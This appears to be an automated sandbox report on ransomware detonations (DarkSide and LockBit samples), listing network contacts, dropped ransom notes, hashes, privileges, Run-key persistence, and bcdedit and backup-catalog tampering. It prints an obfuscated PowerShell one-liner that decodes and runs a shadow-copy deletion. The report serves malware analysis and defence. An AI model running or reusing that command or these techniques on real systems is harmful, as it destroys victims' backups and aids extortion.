US 8.8.8.8:53 161.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 162.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 163.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 164.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 165.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 166.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 167.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 168.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 171.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 172.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 174.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 175.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 176.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 178.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 170.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 179.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 181.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 180.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 182.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 183.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 184.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 188.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 189.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 190.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 192.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 191.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 193.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 194.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 195.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 196.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 202.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 207.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 211.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 217.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 219.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 224.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 203.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 231.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 229.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 233.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 235.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 236.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 240.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 243.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 241.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 244.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 246.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 251.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 253.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 249.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 250.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 254.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 200.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 199.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 198.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 197.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 227.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 201.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 223.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 225.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 222.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 220.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 221.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 218.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 215.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 216.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 214.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 212.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 213.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 210.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 209.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 208.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 206.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 204.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 205.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 252.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 247.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 245.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 242.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 239.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 237.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 238.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 234.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 248.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 230.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 232.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 228.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 132.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 131.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 185.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 135.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 136.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 149.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 144.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 173.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 177.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 169.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 158.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 186.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 139.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 137.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 138.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 140.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 150.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 147.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 143.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 141.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 157.1.127.10.in-addr.arpa udp
US 13.248.169.48:443 catsdegree.com tcp
HK 154.219.131.251:443 temisleyes.com tcp
US 8.8.8.8:53 224.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 219.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 251.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 235.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 240.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 244.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 236.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 233.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 243.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 231.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 229.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 189.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 246.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 250.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 254.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 249.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 253.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 201.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 241.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 199.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 197.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 227.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 198.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 200.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 223.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 215.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 222.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 225.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 214.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 216.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 221.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 210.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 212.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 220.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 213.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 209.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 218.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 206.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 204.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 205.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 208.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 252.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 242.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 245.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 247.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 248.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 239.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 232.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 237.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 238.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 234.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 228.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 230.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 31.73.42.20.in-addr.arpa udp

Files

memory/2780-0-0x00000000002C0000-0x00000000002D7000-memory.dmp

memory/2780-8-0x00000000002C0000-0x00000000002D7000-memory.dmp

memory/2324-10-0x00007FFC1B7D3000-0x00007FFC1B7D5000-memory.dmp

memory/2324-16-0x0000028144290000-0x00000281442B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jgyqzljn.k4d.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2324-21-0x00007FFC1B7D0000-0x00007FFC1C291000-memory.dmp

memory/2324-22-0x00007FFC1B7D0000-0x00007FFC1C291000-memory.dmp

memory/2780-23-0x00000000002C0000-0x00000000002D7000-memory.dmp

memory/2324-24-0x00007FFC1B7D0000-0x00007FFC1C291000-memory.dmp

memory/2324-27-0x00007FFC1B7D0000-0x00007FFC1C291000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 556084f2c6d459c116a69d6fedcc4105
SHA1 633e89b9a1e77942d822d14de6708430a3944dbc
SHA256 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d34112a7b4df3c9e30ace966437c5e40
SHA1 ec07125ad2db8415cf2602d1a796dc3dfc8a54d6
SHA256 cd9665cdaf412455d6f8dbdb60c721d0cf2ac992f7cd4830d89e8c75f9cfbfbf
SHA512 49fd43e69ece9c8185ada6b6ea5bd8619cb2b31de49793d3bd80180ecf3cf8ad24cac6c494185c99623417de52465c832166f7a4890d36ac0f3be5bd7652e053

C:\Users\Admin\README.bf9fb421.TXT

MD5 f418a249405444da33cc73b402a26306
SHA1 1a6c493e74036f93f0dae4b65e6c543c213ce418
SHA256 b348457b3cd38a91d113b0dfbf5bdf9d830b39f5ab849b126fff027534ef2e09
SHA512 b848dd2bb5654aac30d36279af1b9460b36c2df9c8f696d5349a870cd9be8b0aac203623c2025e8b32e646b0558ee27cf72e04db6aee3a2cd548d5c29575efaf

memory/2780-222-0x00000000002C0000-0x00000000002D7000-memory.dmp

memory/2780-227-0x00000000002C0000-0x00000000002D7000-memory.dmp

memory/2780-229-0x00000000002C0000-0x00000000002D7000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win7-20240705-en

Max time kernel

1559s

Max time network

1568s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe"

Signatures

DarkSide

ransomware darkside

Renames multiple (150) files with added filename extension

ransomware

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

N/A

Files

memory/2384-0-0x0000000000E60000-0x0000000000E70000-memory.dmp

memory/2316-5-0x000007FEF594E000-0x000007FEF594F000-memory.dmp

memory/2316-6-0x000000001B5A0000-0x000000001B882000-memory.dmp

memory/2316-7-0x0000000002080000-0x0000000002088000-memory.dmp

memory/2316-8-0x000007FEF5690000-0x000007FEF602D000-memory.dmp

memory/2316-9-0x000007FEF5690000-0x000007FEF602D000-memory.dmp

memory/2316-10-0x000007FEF5690000-0x000007FEF602D000-memory.dmp

memory/2316-11-0x000007FEF5690000-0x000007FEF602D000-memory.dmp

memory/2384-12-0x0000000000E60000-0x0000000000E70000-memory.dmp

memory/2316-13-0x000007FEF5690000-0x000007FEF602D000-memory.dmp

C:\Users\README.a2dbc85c.TXT

MD5 25d0b19a0ec34a39dfa3e177866f01a3
SHA1 a3704d1f6499738ccd694bdd6008a850c6b2e453
SHA256 f030ee74e406acb06d43e73c5127df0206e8affc85b95e9895b100d89391dea8
SHA512 ede7562f04b5f9abf792196ae87d82e14d651dc70e9a5b5ec0e9cb14d13aba27f8ebfacda2191de48dff882131dfad8c7bad51e7fb89b71dd3bbe748adc77198

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 db5976b09a5ea23bdc1f450ffbbec067
SHA1 452cc01c049df3866f8edc2f8fe7f9d21dd93bd1
SHA256 8f4986961c5abcac37cdc4ed1cdb5ded9b2f37cf3ff0bf8c5b8c5f2a162ca50f
SHA512 7a62f04742b572a40d2e162f18b8a759af26763a7e9cf78d700423a0f9289bafca4c459d3d93c157eea0eb281f03968c5ad7c566589c4f4d2e9d422094e35f97

memory/2384-209-0x0000000000E60000-0x0000000000E70000-memory.dmp

memory/2384-218-0x0000000000E60000-0x0000000000E70000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 16:13

Platform

win10v2004-20240704-en

Max time kernel

1661s

Max time network

1171s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"

Signatures

Lockbit

ransomware lockbit

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (6418) files with added filename extension

ransomware

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RansomwareSamples\\LockBit_14_02_2021_146KB.exe\"" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\Users\\Admin\\Desktop\\LockBit-note.hta" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\118C.tmp.bmp" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\7-Zip\Lang\et.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\ecc.md C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_CatEye.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\BadgeLogo.scale-400_contrast-white.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
